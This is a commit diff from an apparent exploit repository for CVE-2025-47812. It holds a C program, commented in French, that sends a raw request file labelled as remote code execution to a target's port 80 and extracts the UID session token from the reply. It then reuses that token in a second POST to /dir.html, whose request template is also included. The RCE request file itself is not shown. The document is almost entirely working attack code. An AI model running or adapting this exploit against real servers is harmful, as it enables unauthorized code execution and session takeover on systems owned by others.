Master/Exploit_CVE-2025-47812
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update

Browse Source
This commit is contained in:
hexplor
2026-04-26 04:10:02 +02:00
parent 904f9d9ddb
commit 2ca0abe734
2 changed files with 242 additions and 71 deletions
Download Patch File Download Diff File Expand all files Collapse all files
exploit.c
+224 -70
View File
@@ -3,79 +3,233 @@
#include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <stdlib.h>
#include <string.h> #include <string.h>
#include <unistd.h>
int main(int argc, char** argv){ void envoie_request(void);
if (argc != 2){ void recevoir_request(void);
printf("u must specifie IP addr\n"); void recup_uid(void);
exit(1);
}
printf("target = %s\n", argv[1]);
int domain = AF_INET;
int type = SOCK_STREAM;
int fd = socket(domain, type, 0);
printf("fd = %d\n", fd);
struct sockaddr_in dest_addr; int creer_et_connecter_socket(const char* ip_addr) {
memset(&dest_addr, 0, sizeof(dest_addr)); int domain = AF_INET;
dest_addr.sin_family = AF_INET; int type = SOCK_STREAM;
dest_addr.sin_port = htons(80); int fd = socket(domain, type, 0);
dest_addr.sin_addr.s_addr = inet_addr(argv[1]); if (fd < 0) {
printf("Erreur création socket\n");
return -1;
}
printf("fd = %d\n", fd);
int ret = connect(fd,(struct sockaddr*)&dest_addr, sizeof(dest_addr)); struct sockaddr_in dest_addr;
printf("ret_connect = %d\n", ret); memset(&dest_addr, 0, sizeof(dest_addr));
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(80);
dest_addr.sin_addr.s_addr = inet_addr(ip_addr);
FILE* fichier_out = fopen("request_rce.txt", "r"); int ret = connect(fd, (struct sockaddr*)&dest_addr, sizeof(dest_addr));
fseek(fichier_out, 0, SEEK_END); if (ret < 0) {
printf("Erreur connexion\n");
close(fd);
return -1;
}
printf("ret_connect = %d\n", ret);
return fd;
int size = fichier_out->_offset; }
char* file_buffer = malloc(size);
void envoyer_requete(int fd, const char* fichier_requete) {
fseek(fichier_out, 0, SEEK_SET); FILE* fichier_out = fopen(fichier_requete, "r");
fread(file_buffer, 1, size, fichier_out); if (!fichier_out) {
printf("Erreur ouverture fichier: %s\n", fichier_requete);
for (int i = 0; i < size; i++){ return;
char c = file_buffer[i]; }
if (c == '\n')
send(fd, "\r\n", 2, 0); fseek(fichier_out, 0, SEEK_END);
else long size = ftell(fichier_out);
send(fd, &c, 1, 0); char* file_buffer = malloc(size + 1);
}
send(fd, "\r\n", 2, 0); fseek(fichier_out, 0, SEEK_SET);
fread(file_buffer, 1, size, fichier_out);
printf("recv:\n"); file_buffer[size] = '\0';
char c = 0;
int n = 0; printf("\n--- Envoi requête depuis %s ---\n", fichier_requete);
char* text = calloc(1, 1);
int len = 0; for (int i = 0; i < size; i++) {
while (( n = recv(fd, &c, 1, 0)) > 0){ char c = file_buffer[i];
len = strlen(text) + 2; if (c == '\n')
text = realloc(text, len); send(fd, "\r\n", 2, 0);
text[len - 2] = c; else
text[len - 1] = 0; send(fd, &c, 1, 0);
} }
int index = 0; send(fd, "\r\n", 2, 0);
char uid[400];
while (text[index]){ free(file_buffer);
if (text[index] == 'U'){ fclose(fichier_out);
if (strncmp(text + index, "UID=", 4) == 0){ }
printf("pattern found\n");
index += 4; void recevoir_reponse(int fd, char** reponse, int* taille) {
int j = 0 ; char c = 0;
while(text[index] && text[index] != ';' && text[index] != '\r' && text[index] != '\n'){ int n = 0;
uid[j] = text[index]; char* text = calloc(1, 1);
j++; int len = 0;
index++;
} printf("\n--- Réponse reçue ---\n");
uid[j + 1] = 0;
break; struct timeval tv;
} tv.tv_sec = 5;
} tv.tv_usec = 0;
index++; setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
} while ((n = recv(fd, &c, 1, 0)) > 0) {
printf("uid=%s\n", uid); printf("%c", c);
fclose(fichier_out); len = strlen(text) + 2;
free(file_buffer); text = realloc(text, len);
return 0; text[len - 2] = c;
text[len - 1] = 0;
}
printf("\n--- Fin réponse ---\n");
*reponse = text;
*taille = len;
}
char* extraire_uid(const char* reponse) {
int index = 0;
char* uid = malloc(400);
memset(uid, 0, 400);
while (reponse[index]) {
if (reponse[index] == 'U') {
if (strncmp(reponse + index, "UID=", 4) == 0) {
printf("\nPattern UID= trouvé\n");
index += 4;
int j = 0;
while (reponse[index] && reponse[index] != ';' &&
reponse[index] != '\r' && reponse[index] != '\n') {
uid[j] = reponse[index];
j++;
index++;
}
uid[j] = 0;
break;
}
}
index++;
}
if (strlen(uid) == 0) {
printf("UID non trouvé dans la réponse\n");
free(uid);
return NULL;
}
printf("UID extrait = %s\n", uid);
return uid;
}
void envoyer_requete_dir_avec_token(int fd, const char* fichier_requete, const char* uid) {
FILE* fichier_out = fopen(fichier_requete, "r");
if (!fichier_out) {
printf("Erreur ouverture fichier: %s\n", fichier_requete);
return;
}
fseek(fichier_out, 0, SEEK_END);
long size = ftell(fichier_out);
char* file_buffer = malloc(size + 1);
fseek(fichier_out, 0, SEEK_SET);
fread(file_buffer, 1, size, fichier_out);
file_buffer[size] = '\0';
printf("\n--- Envoi requête DIR avec UID: %s ---\n", uid);
for (int i = 0; i < size; i++) {
char c = file_buffer[i];
printf("%c", c);
if (c == 'U') {
if (strncmp(file_buffer + i, "UID=", 4) == 0) {
send(fd, file_buffer + i, 4, 0);
send(fd, uid, strlen(uid), 0);
send(fd, "\r\n", 2, 0);
printf("ID=%s", uid);
i += 3;
continue;
}
}
else if (c == '\n') {
send(fd, "\r\n", 2, 0);
}
else {
send(fd, &c, 1, 0);
}
}
send(fd, "\r\n\r\n", 4, 0);
free(file_buffer);
fclose(fichier_out);
}
int main(int argc, char** argv) {
if (argc != 2) {
printf("Tu dois spécifier l'adresse IP\n");
exit(1);
}
printf("target = %s\n", argv[1]);
printf("\n========== PREMIÈRE REQUÊTE (RCE) ==========\n");
int fd = creer_et_connecter_socket(argv[1]);
if (fd < 0) {
exit(1);
}
envoyer_requete(fd, "request_rce.txt");
char* reponse1 = NULL;
int taille1 = 0;
recevoir_reponse(fd, &reponse1, &taille1);
char* uid = extraire_uid(reponse1);
close(fd);
if (!uid) {
printf("Impossible d'extraire l'UID, arrêt du programme\n");
free(reponse1);
exit(1);
}
printf("\nUID récupéré avec succès: [%s]\n", uid);
printf("\n========== DEUXIÈME REQUÊTE (DIR) ==========\n");
int fd2 = creer_et_connecter_socket(argv[1]);
if (fd2 < 0) {
free(uid);
free(reponse1);
exit(1);
}
envoyer_requete_dir_avec_token(fd2, "request_dir_with_token.txt", uid);
char* reponse2 = NULL;
int taille2 = 0;
recevoir_reponse(fd2, &reponse2, &taille2);
if (reponse2 && strlen(reponse2) > 0) {
printf("\n--- RÉPONSE DIR COMPLÈTE ---\n");
printf("%s\n", reponse2);
} else {
printf("\nAucune réponse reçue pour la requête DIR\n");
}
close(fd2);
free(uid);
free(reponse1);
free(reponse2);
return 0;
} }
request_dir_with_token.txt
+17
View File
@@ -0,0 +1,17 @@
POST /dir.html HTTP/1.1
Host: localhost
sec-ch-ua-platform: "Windows"
Accept-Language: fr-FR,fr;q=0.9
sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/main.html
Accept-Encoding: gzip, deflate, br
Cookie: client_lang=french; viewmode=0; UID=
Connection: keep-alive